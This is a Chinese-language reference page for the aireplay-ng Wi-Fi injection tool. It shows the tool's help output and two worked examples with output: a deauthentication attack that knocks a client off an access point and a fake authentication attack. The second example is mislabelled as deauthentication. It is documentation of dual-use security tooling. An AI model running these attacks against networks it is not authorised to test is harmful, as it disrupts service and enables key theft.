Aireplay-ng 介绍

Aireplay-ng 包含在aircrack-ng包中无线帧,用于注入,它的主要作用是产生流量供以后使用aircrack-ng破解WEP和WPA-PSK钥匙,Aireplay-ng有许多攻击可以deauthenticate无线客户捕捉WPA握手数据为目的的,假的认证,交互式数据包回放,手工ARP请求注入和广播ARP请求回注,

作者:Thomas d’Otreppe, Original work: Christophe Devine
证书:GPL v2

Kali aircrack-ng Repo 仓库

aireplay-ng – 注入包无线网络产生流量

root@kali:~# aireplay-ng --help

  Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe

  usage: aireplay-ng <options> <replay interface>

  Filter options:
      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len   : minimum packet length
      -n len   : maximum packet length
      -u type   : frame control, type field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To DS bit
      -f fromds : frame control, From DS bit
      -w iswep  : frame control, WEP bit
      -D    : disable AP detection

  Replay options:
      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination MAC address
      -h smac   : set Source MAC address
      -g value  : change ring buffer size (default: 8)
      -F     : choose first matching packet

  Fakeauth attack options:
      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec   : seconds between keep-alives
      -Q      : send reassociation requests
      -y prga   : keystream for shared key auth
      -T n     : exit after retry fake auth request n time

  Arp Replay attack options:
      -j     : inject FromDS packets

  Fragmentation attack options:
      -k IP  : set destination IP in fragments
      -l IP  : set source IP in fragments

  Test attack options:
      -B     : activates the bitrate test

  Source options:
      -i iface : capture packets from this interface
      -r file  : extract packets from this pcap file

  Miscellaneous options:
      -R   : disable /dev/rtc usage
      --ignore-negative-one : if the interface's channel can't be
      determined,ignore the mismatch, needed for unpatched cfg80211,

  Attack modes (numbers can still be used):
      --deauth count : deauthenticate 1 or all stations (-0)
      --fakeauth delay : fake authentication with AP (-1)
      --interactive : interactive frame selection (-2)
      --arpreplay : standard ARP-request replay (-3)
      --chopchop : decrypt/chopchop WEP packet (-4)
      --fragment : generates valid keystream   (-5)
      --caffe-latte : query a client for new IVs  (-6)
      --cfrag : fragments against a client  (-7)
      --migmode : attacks WPA migration mode  (-8)
      --test : tests injection and quality (-9)

      --help : Displays this usage screen

aireplay-ng 示例

Deauthentication 攻击

运行deauthentication攻击(-0),发送5个数据包到无线访问点(-a 8c:7:3b:7e:81:B6)deauthenticate无线客户端(-c 00:08:22:B9:41:A1)通过接口wlan0mon监控模式。

root@kali:~# aireplay-ng -0 5 -a 8C:7F:3B:7E:81:B6 -c 00:08:22:B9:41:A1 wlan0mon
12:41:56 Waiting for beacon frame (BSSID: 8C:7F:3B:7E:81:B6) on channel 6
12:41:57 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:59 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:42:00 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]


Deauthentication 攻击

假身份验证攻击和重新运行每6000秒(-1 6000)对访问点(-a F0:F2:49:82:DF:3b)与给定ESSID(-e FBI-Van-24),指定我们的mac地址(-h 3c:46:d8:4e:ef:aa),使用监控模式接口wlan0mon。

root@kali:~# aireplay-ng -1 6000 -e FBI-Van-24 -a F0:F2:49:82:DF:3B -h 3c:46:d8:4e:ef:aa wlan0mon
12:49:59  Waiting for beacon frame (BSSID: F0:F2:49:82:DF:3B) on channel 6
12:50:06  Sending Authentication Request (Open System)